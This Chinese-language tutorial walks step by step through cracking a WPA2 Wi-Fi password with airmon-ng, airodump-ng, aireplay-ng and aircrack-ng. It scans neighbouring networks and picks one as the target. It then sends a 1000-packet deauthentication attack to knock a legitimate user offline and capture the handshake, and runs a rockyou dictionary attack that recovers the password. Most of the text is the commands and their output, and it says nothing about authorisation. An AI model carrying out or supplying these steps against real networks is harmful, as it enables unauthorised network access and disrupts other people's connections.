12670222_193900253000_2用到的工具

airmon-ng
airodump-ng
aireplay-ng
aircrack-ng

过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

root@lm:~# ifconfig
eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
inet6 addr: xxxx::xxx:xxxx:xxxx:xxxx/xx Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:26 errors:0 dropped:0 overruns:0 frame:0
TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2360 (2.3 KiB) TX bytes:5094 (4.9 KiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:93 errors:0 dropped:0 overruns:0 frame:0
TX packets:93 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:34569 (33.7 KiB) TX bytes:34569 (33.7 KiB)

wlan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

airmon-ng

我们看到没有mon0

接着下一条命令,开启监听模式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

root@lm:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
3494 NetworkManager
4348 dhclient
4769 wpa_supplicant

Interface Chipset Driver

wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode enabled on mon0)

红色字体mon0已经开启,这时候再次输入ifconfig,发现是不是有mon0了!

接下来开始探测AP

airodump-ng

airodump-ng mon0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

CH 7 ][ Elapsed: 1 min ][ 2015-04-03 19:28 

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

xx:xx:xx:xx:xx:xx -53 30 0 0 11 54e. WPA2 CCMP PSK Adminlm
xx:xx:xx:xx:xx:xx -80 32 0 0 1 54e. WPA2 CCMP PSK 415
xx:xx:xx:xx:xx:xx -79 34 435 0 11 54e WPA2 CCMP PSK FAST_CE6F84
xx:xx:xx:xx:xx:xx -80 28 1 0 1 54e. WPA2 CCMP PSK �.��..0809
xx:xx:xx:xx:xx:xx -81 24 1 0 9 54e WPA2 CCMP PSK Celleden_Map1600
xx:xx:xx:xx:xx:xx -85 25 0 0 11 54e. WPA2 CCMP PSK TP-LINK_7FC6
xx:xx:xx:xx:xx:xx -91 18 0 0 11 54e. WPA2 CCMP PSK MERCURY209
xx:xx:xx:xx:xx:xx -91 17 0 0 6 54e. WPA2 CCMP PSK TP-LINK_C24BCA
xx:xx:xx:xx:xx:xx -94 3 0 0 11 54e. WPA2 CCMP PSK 360�..费WiFi-MZ
xx:xx:xx:xx:xx:xx -89 6 0 0 1 54e WPA2 CCMP PSK W
xx:xx:xx:xx:xx:xx -91 2 0 0 6 54e. WPA2 CCMP PSK pybc110

BSSID STATION PWR Rate Lost Frames Probe

(not associated) xx:xx:xx:xx:xx:xx -54 0 - 1 417 95 A�.���.�.�车��.,修武�..�..��.欢a_0

可以看到上方有很多BSSID也就是常说的MAC地址

我们选择一个BSSID进行攻击,抓包

1

airodump-ng -w 保存包的路径 -c 频道 -b BSSID mon0 (airodump-ng -w /root/Desktop/wifi -c 11 -b xx:xx:xx:xx:xx:xx mon0)

airodump-ng 参数

1

aireplay-ng -0 次数 -a AP'MAC -c 客户端'MAC mon0 --ignore-negative-one (aireplay-ng -0 1000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0 --ignore-negative-one)

对合法用户进行deauth攻击,使其掉线重新连接AP,那么我们就静静等待抓握手包

10

看到这个就说明,我们已经抓到他的握手包了

接下来就是跑包环节

aircrack-ng

1

aircrack-ng -w< 字典 握手包 [我的字典文件在/root/password/,握手包在主文件夹下那么,就这样写] aircrack-ng -w /root/password/rockyou.txt adminlm*.cap

不要问我*是什么意思,你们应该懂! (*相当于模糊搜索)

11

在   Index number of target network ?  我们选择2,也就是我们抓到握手包的那个 回车键

12

密码跑出来了,123456789